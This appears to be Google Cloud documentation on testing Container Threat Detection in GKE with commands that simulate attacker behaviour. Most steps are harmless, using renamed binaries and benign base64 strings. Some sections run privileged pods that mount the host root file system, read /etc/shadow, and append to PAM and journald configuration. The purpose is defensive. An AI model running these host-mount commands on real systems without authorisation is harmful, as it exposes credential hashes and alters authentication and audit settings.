This page explains how to verify that Container Threat Detection is working by intentionallytriggering detectors and checking for findings. Container Threat Detection is abuilt-in service of the Premium and Enterprise tiers of Security Command Center.To view Container Threat Detectionfindings, Container Threat Detection must be enabled in Security Command CenterServices settings.

Before you begin

To detect potential threats to your containers, you need to make sure that yourclusters are on a supported version of Google Kubernetes Engine (GKE). Formore information, seeUsing a supported GKE version. If you want to testthreat detection on ARM, you need a cluster with a node pool containing ARMinstances. For more information, seeArm workloads on GKE.

Enable detectors

Some detectors are disabled by default. To test those detectors, you must firstenable them. For a complete list of detectors that are disabled by default, seeDisableddetectors.

1. To check the status of all detectors, run the following command:

   exportPROJECT=PROJECT_IDgcloudalphasccsettingsservicesdescribe\--service=CONTAINER_THREAT_DETECTION\--project=${PROJECT}

2. To enable a detector, run the following command:

   gcloudalphasccsettingsservicesmodulesenable\--service=CONTAINER_THREAT_DETECTION\--module=MODULE_NAME\--project=${PROJECT}

   ReplaceMODULE_NAME with the module name of thedetector that you want to enable. For a complete list of detectors and theircorresponding module names, seeContainer Threat Detectiondetectors.

   For example, to enable theAdded Binary Executed detector, run thefollowing command:

   gcloudalphasccsettingsservicesmodulesenable\--service=CONTAINER_THREAT_DETECTION\--module=ADDED_BINARY_EXECUTED\--project=${PROJECT}

Set environment variables

To test detectors, use the Google Cloud console and Cloud Shell. You can setenvironment variables in Cloud Shell to make it easier to runcommands. The following variables are used to test all Container Threat Detectiondetectors.

1. Go to theGoogle Cloud console.

   Go to the Google Cloud console

2. Select the project that contains the container you want to use to test.

3. ClickActivate Cloud Shell.

4. In Cloud Shell, set environment variables.

   1. The zone your cluster is in:

      exportZONE=CLUSTER_ZONE

   2. The project your container is in:

      exportPROJECT=PROJECT_ID

   3. Your cluster name:

      exportCLUSTER_NAME=CLUSTER_NAME

The variables are set. The following sections include instructions for testingContainer Threat Detection detectors.

Added Binary Executed

To trigger an Added Binary Executed finding, drop a binary in your container andexecute it. This example deploys the latest Ubuntu 24.04 image, copies/bin/lsto another location, and then executes it. The binary's execution is unexpectedbecause the copy of the binary wasn't part of the original container image, evenwhen that image is on Ubuntu 24.04, and containers are meant to be immutable.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Drop a binary and execute it:

   • x86 node:

     tag="ktd-test-binary-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c"cp /bin/ls /tmp/$tag; /tmp/$tag"

   • ARM node:

     tag="ktd-test-binary-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":    {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":    "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",    "value": "arm64" } ]}}'\"$tag"--sh-c"cp /bin/ls /tmp/$tag; /tmp/$tag"

This test procedure creates an Added Binary Executed finding that you canview in Security Command Center, and in Cloud Logging if you've configuredLogging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate the Premium or Enterprisetier of Security Command Center.

For noise reduction, when you first create a container, Container Threat Detectiontemporarily filters Added Binary Executed findings. To see all Added BinaryExecuted findings while a container is being set up, prefix your container nameor Pod name withktd-test, as in the example.

Added Library Loaded

To trigger an Added Library Loaded finding, drop a library in your container andthen load it. This example deploys the latest Ubuntu 24.04 image, copies/lib/x86_64-linux-gnu/libc.so.6 to another location, and then loads it usingld. The loaded library is unexpected because the copy of the library was notpart of the original container image, even if that image is on Ubuntu 24.04, andcontainers are meant to be immutable.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Drop a library and useld to load it:

   • x86 node:

     tag="ktd-test-library-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--sh-c\"cp /lib/x86_64-linux-gnu/libc.so.6 /tmp/$tag; /lib64/ld-linux-x86-64.so.2 /tmp/$tag"

   • ARM node:

     tag="ktd-test-library-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--sh-c\"cp /lib/aarch64-linux-gnu/libc.so.6 /tmp/$tag; /lib/ld-linux-aarch64.so.1 /tmp/$tag"

This test procedure creates an Added Library Loaded finding that you canview in Security Command Center, and in Cloud Logging if you've configuredLogging for Container Threat Detection. Viewing findings inCloud Logging is only available if you activate the Premium or Enterprisetier of Security Command Center at the organization level.

For noise reduction, when you first create a container, Container Threat Detectiontemporarily filters Added Library Loaded findings. To see all Added LibraryLoaded findings while a container is being set up, prefix your container nameor Pod name withktd-test, as in the example.

Collection: Pam.d Modification (Preview)

To trigger a pam.d modification detection, modify one of the host's PAM relatedfiles. This example deploys the latest Ubuntu 24.04 image, mounting the host'sroot file system into the container, and then modifies/etc/pam.d/sshd.

This is a file monitoring detector and hasspecific GKE version requirements.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a binary that modifies one of the PAM related files on the host.

   • x86 node:

     tag="ktd-test-pamd-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/pam.d/sshd"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

   • ARM node:

     tag="ktd-test-pamd-arm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/pam.d/sshd"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],   "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" }] }}'

This test procedure triggers a pam.d modification finding thatyou can view in Security Command Center and, if you have configuredLogging for Container Threat Detection, in Cloud Logging. Viewingfindings in Cloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Command and Control: Piped Encoded Code Execution

To trigger aCommand and Control: Piped Encoded Code Executionfinding, a binary capable of code execution such aspython must have abase64decode command piped into its execution. This example uses thelatest Ubuntu 24.04 image. It usesecho to pipe an encoded string that printsHello World and to thepython executable. This behavior is flagged assuspicious because it can indicate an attempt to run a malicious script by anattacker.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Decode and pipe a base64-encoded string intopython:

   • x86 node:

     tag="ktd-test-piped-exec-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/echo /tmp/python; echo \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d | /tmp/python; sleep 10"

   • ARM node:

     tag="ktd-test-piped-exec-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/echo /tmp/python; echo \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d | /tmp/python; sleep 10"

This test procedure creates aCommand and Control: Piped Encoded Code Executionfinding that you can view in Security Command Center and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Command and Control: Piped Encoded Download

To trigger aCommand and Control: Piped Encoded Downloadfinding, an executable such ascurl must be piped into abase64decode command. This example uses the latest Ubuntu 24.04 image. It copies/bin/echo and renames that tocurl and then pipes a simulated curl call intobase64. This behavior is flagged as suspicious because it can indicate anattempt to download and decode a malicious script to later be used by an attacker.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute and pipe acurl call intobase64 -d:

   • x86 node:

     tag="ktd-test-piped-dl-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/echo /tmp/curl; /tmp/curl \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d; sleep 10"

   • ARM node:

     tag="ktd-test-piped-dl-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/echo /tmp/curl; /tmp/curl \"cHJpbnQoJ0hlbGxvIFdvcmxkJyk=\" | base64 -d; sleep 10"

This test procedure creates aCommand and Control: Piped Encoded Downloadfinding that you can view in Security Command Center and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Command and Control: Steganography Tool Detected

To trigger aCommand and Control: Steganography Tool Detected (Preview)finding, a binary with file manipulation capabilities consistent withsteganography tools must execute within a container. This example uses thelatest Ubuntu 24.04 image. It copies/bin/ls and renames that tosteghide(or another steganography tool likestegano). This behavior is flagged assuspicious because it can indicate an attempt to prepare a container for hidingor extracting data, potentially for malicious purposes.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a steganography tool binary likesteghide:

   • x86 node:

     tag="ktd-test-steganography-tool-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/steghide; /tmp/steghide"

   • ARM node:

     tag="ktd-test-steganography-tool-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/steghide; /tmp/steghide"

This test procedure creates aCommand and Control: Steganography ToolDetected finding that you can view in Security Command Center and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Credential Access: Access Sensitive Files on Nodes (Preview)

To trigger a Sensitive File Accessed detection, read the host's/etc/shadowfile. This example deploys the latest Ubuntu 24.04 image, mounting the host'sroot file system into the container, and then reads/etc/shadow usingcat.

This is a file monitoring detector and hasspecific GKE version requirements.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a binary that reads the host's/etc/shadow file.

   • x86 node:

     tag="ktd-test-sfa-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["/bin/cat", "/host/etc/shadow"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

   • ARM node:

     tag="ktd-test-sfa-arm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["/bin/cat", "/host/etc/shadow"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],   "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" }] }}'

This test procedure triggers a Sensitive File Accessed finding thatyou can view in Security Command Center and, if you have configuredLogging for Container Threat Detection, in Cloud Logging. Viewingfindings in Cloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Credential Access: Find Google Cloud Credentials

To trigger aCredential Access: Find Google Cloud Credentials finding, abinary capable of searching file contents needs to be executed within acontainer. This example uses the latest Ubuntu 24.04 image. It copies/bin/lsand renames that togrep. The renamed binary is then executed with argumentsthat specify a search pattern indicative of a form of Google Cloud credentials.This action is flagged as suspicious because it mimics the behavior observedwhen attempting to locate Google Cloud credentials.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a search tool binary likefind with appropriate arguments:

   • x86 node:

     tag="ktd-test-find-gcp-credentials-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/grep; /tmp/grep GOOGLE_APPLICATION_CREDENTIALS"

   • ARM node:

     tag="ktd-test-find-gcp-credentials-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/grep; /tmp/grep GOOGLE_APPLICATION_CREDENTIALS"

This test procedure creates anCredential Access: Find Google Cloud Credentialsfinding that you can view in Security Command Center, and in Cloud Logging ifyou've configured Logging for Container Threat Detection. Viewingfindings in Cloud Logging is only available if you activate the Premium orEnterprise tier of Security Command Center.

Credential Access: GPG Key Reconnaissance

To trigger anCredential Access: GPG Key Reconnaissance finding, abinary capable of searching file contents needs to be executed within acontainer. This example uses the latest Ubuntu 24.04 image. It copies/bin/lsand renames that tofind (or another suitable search utility like grep). Therenamed binary is then executed with arguments that specify a search patternindicative of private keys or passwords, or content patterns suggestingpasswords or secrets. This action is flagged as suspicious because it mimics thebehavior observed when attempting to locate GPG security keys.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a search tool binary likefind with appropriate arguments:

   • x86 node:

     tag="ktd-test-gpg-key-reconnaissance-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/find; /tmp/find secring.gpg"

   • ARM node:

     tag="ktd-test-gpg-key-reconnaissance-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/find; /tmp/find secring.gpg"

This test procedure creates anCredential Access: GPG Key Reconnaissancefinding that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Credential Access: Search Private Keys or Passwords

To trigger anCredential Access: Search Private Keys or Passwords finding, abinary capable of searching file contents needs to be executed within acontainer. This example uses the latest Ubuntu 24.04 image. It copies/bin/lsand renames that tofind (or another suitable search utility like grep). Therenamed binary is then executed with arguments that specify a search patternindicative of private keys or passwords, or content patterns suggestingpasswords or secrets. This action is flagged as suspicious because it mimics thebehavior observed when attempting to locate sensitive information like privatekeys or passwords within a containerized environment.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a search tool binary likefind with appropriate arguments:

   • x86 node:

     tag="ktd-test-search-private-keys-or-pw-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/find; /tmp/find id_rsa"

   • ARM node:

     tag="ktd-test-search-private-keys-or-pw-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/find; /tmp/find id_rsa"

This test procedure creates anCredential Access: Search Private Keys orPasswords finding that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Defense Evasion: Base64 ELF File Command Lines

To trigger anDefense Evasion: Base64 ELF File Command Line finding, aprocess must havebase64 as an argument andf0VMRgIB as an argumentwhich is the base64 encoded form ofELF. This example uses the latestUbuntu 24.04 image.base64 is then executed with the-d andf0VMRgIB arguments.This action is flagged as suspicious because it mimics the behavior observedwhen attempting to decode binary data to execute malicious code.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a search tool binary likefind with appropriate arguments:

   • x86 node:

     tag="ktd-test-base64-elf-file-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"base64 -d f0VMRgIB"

   • ARM node:

     tag="ktd-test-base64-elf-file-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"base64 -d f0VMRgIB"

This test procedure creates twoDefense Evasion: Base64 ELF File Command Linefindings that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center. Two findingsare created because the initialbash -c command as well as the execution ofthebase64 -d command satisfy the finding criteria.

Defense Evasion: Base64 Encoded Python Script Executed

To trigger anDefense Evasion: Base64 Encoded Python Script Executed finding, aprocess must haveecho orbase64 as an argument andaW1wb3J0IH as an argumentwhich is the base64 encoded form ofpython -c. This example uses the latestUbuntu 24.04 image.echo is then executed with theaW1wb3J0IH argument.This action is flagged as suspicious because it mimics the behavior observedwhen attempting to decode binary data to execute malicious code.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a search tool binary likefind with appropriate arguments:

   • x86 node:

     tag="ktd-test-base64-elf-file-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"echo aW1wb3J0IH"

   • ARM node:

     tag="ktd-test-base64-elf-file-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"echo aW1wb3J0IH"

This test procedure creates aDefense Evasion: Base64 Encoded Python Script Executedfinding that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Defense Evasion: Base64 Encoded Shell Script Executed

To trigger anDefense Evasion: Base64 Encoded Shell Script Executed finding, aprocess must haveecho orbase64 as an argument andIyEvYmluL2Jhc2gK as an argumentwhich is the base64 encoded form of#!/bin/bash. This example uses the latestUbuntu 24.04 image.echo is then executed with theIyEvYmluL2Jhc2gK argument.This action is flagged as suspicious because it mimics the behavior observedwhen attempting to decode binary data to execute malicious code.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a search tool binary likefind with appropriate arguments:

   • x86 node:

     tag="ktd-test-base64-elf-file-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"echo IyEvYmluL2Jhc2gK"

   • ARM node:

     tag="ktd-test-base64-elf-file-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"echo IyEvYmluL2Jhc2gK"

This test procedure creates aDefense Evasion: Base64 Encoded Shell Script Executedfinding that you can view in Security Command Center, and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Defense Evasion: Disable or Modify Linux Audit System (Preview)

To trigger a Disable or Modify Linux Audit Modification detection, modify one of the host'sauditing-related configuration files. This example deploys the latest Ubuntu 24.04 image,mounting the host's root file system into the container, and then modifies/etc/systemd/journald.conf.

This is a file monitoring detector and hasspecific GKE version requirements.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a binary that modifies one of the host's audit-related configurationfiles, such as/etc/systemd/journald.conf.

   • x86 node:

     tag="ktd-test-audit-mod-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/systemd/journald.conf"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

   • ARM node:

     tag="ktd-test-audit-mod-arm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "/bin/echo >> /host/etc/systemd/journald.conf"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],   "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" }] }}'

This test procedure triggers aDisable or Modify Linux Audit System finding thatyou can view in Security Command Center and, if you have configuredLogging for Container Threat Detection, in Cloud Logging. Viewingfindings in Cloud Logging is only available if you activate thePremium or Enterprise tier of Security Command Center at the organization level.

Defense Evasion: Launch Code Compiler Tool In Container

To trigger aDefense Evasion: Launch Code Compiler Tool In Container(Preview) finding, a code compiler tool must execute within a container.This example uses the latest Ubuntu 24.04 image. It copies/bin/ls and renamesthat togcc10 (or another compiler likeclang). This behavior is flagged assuspicious because it can indicate an attempt to compile and execute maliciouscode within the container to evade detection or modify its behavior.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Execute a compiler binary likegcc10 with appropriate arguments:

   • x86 node:

     tag="ktd-test-launch-code-compiler-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\"$tag"--bash-c\"cp /bin/ls /tmp/gcc10; /tmp/gcc10 -o /tmp/gcc10.o"

   • ARM node:

     tag="ktd-test-launch-code-compiler-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never\--rm=true-i\--imagemarketplace.gcr.io/google/ubuntu2404:latest\--overrides='{"apiVersion": "v1", "spec": { "nodeSelector":   {"kubernetes.io/arch":"arm64"}, "tolerations":[ { "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" } ]}}'\"$tag"--bash-c\"cp /bin/ls /tmp/gcc10; /tmp/gcc10 -o /tmp/gcc10.o"

This test procedure creates aDefense Evasion: Launch Code Compiler ToolIn Container finding that you can view in Security Command Center and inCloud Logging if you've configured Logging forContainer Threat Detection. Viewing findings in Cloud Logging is only available ifyou activate the Premium or Enterprise tier of Security Command Center.

Defense Evasion: Root Certificate Installed (Preview)

To trigger a Root Certificate Installed detection, create a root certificatefile on the host from a container. This example deploys the latest Ubuntu 24.04 image,mounting the host's root file system into the container. It then creates anempty certificate file in an appropriate directory.

This is a file monitoring detector and hasspecific GKE version requirements.

1. Set environment variables.

2. Use Cloud Shell to access the cluster control plane:

   gcloudcontainerclustersget-credentials$CLUSTER_NAME\--zone$ZONE\--project$PROJECT

3. Install a certificate file onto the host from a container.

   • x86 node:

     tag="ktd-test-cert-install-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "mkdir -p /host/etc/pki/tls/certs; /bin/touch /host/etc/pki/tls/certs/ca-bundle.crt"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}]}}'

   • ARM node:

     tag="ktd-test-cert-install-arm-$(date-u+%Y-%m-%d-%H-%M-%S-utc)"kubectlrun\--restart=Never--rm=true-ti--imageubuntu"$tag"\--overrides='{"apiVersion": "v1", "spec": {   "containers":[{"command": ["sh", "-c", "mkdir -p /host/etc/pki/tls/certs; /bin/touch /host/etc/pki/tls/certs/ca-bundle.crt"],   "name": "'$tag'", "image": "marketplace.gcr.io/google/ubuntu2404:latest",   "securityContext": {"privileged": true},   "volumeMounts":[{"mountPath": "/host/", "name": "host-mount",   "readOnly": false}]}],   "volumes": [{"name": "host-mount","hostPath": {"path": "/"}}],   "nodeSelector": {"kubernetes.io/arch":"arm64"}, "tolerations":[{ "effect":   "NoSchedule", "key": "kubernetes.io/arch", "operator": "Equal",   "value": "arm64" }] }}'

